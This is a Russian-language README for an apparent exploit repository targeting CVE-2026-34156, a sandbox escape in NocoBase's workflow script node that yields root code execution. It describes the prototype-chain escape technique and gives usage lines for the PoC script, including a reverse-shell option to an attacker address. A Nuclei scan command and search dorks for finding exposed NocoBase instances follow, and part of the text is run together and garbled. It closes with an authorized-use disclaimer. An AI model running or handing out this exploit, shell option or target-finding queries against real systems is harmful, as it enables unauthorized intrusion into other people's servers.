
CVE-2026-34156
Неаутентифицированное / с низкими привилегиями → удалённое выполнение кода с правами root в NocoBase
CVE-2026-34156 — это критическая уязвимость обхода песочницы в NocoBase (open-source платформа no-code/low-code).
Злоумышленник, имеющий возможность создавать или выполнять узел сценариев рабочего процесса (Workflow Script Node) (даже с низкими привилегиями), может обойти песочницу Node.js vm и получить полное удалённое выполнение кода с правами root внутри контейнера.
@nocobase/plugin-workflow-javascript (узел сценариев)console._stdout.constructor.constructoruid=0)fs)Объект console, передаваемый в песочницу, принадлежит основной области (host realm), что позволяет злоумышленникам подняться по цепочке прототипов и получить доступ к реальному конструктору Function → process.mainModule.require.
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"
# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444
В репозиторий включены: полный PoC-скрипт, шаблон Nuclei и безопасный чекер.
nuclei -u https://target -t cves/CVE-2026-34156.yaml
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"
isolated-vm) в продакшене.
Этот репозиторий предназначен только для образовательных целей и авторизованных исследований безопасности.
Используйте только на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение.
Несанкционированная эксплуатация уязвимости незаконна.
Сделано с ❤️ для сообщества специалистов по безопасности
Будьте в безопасности. Патчите быстро.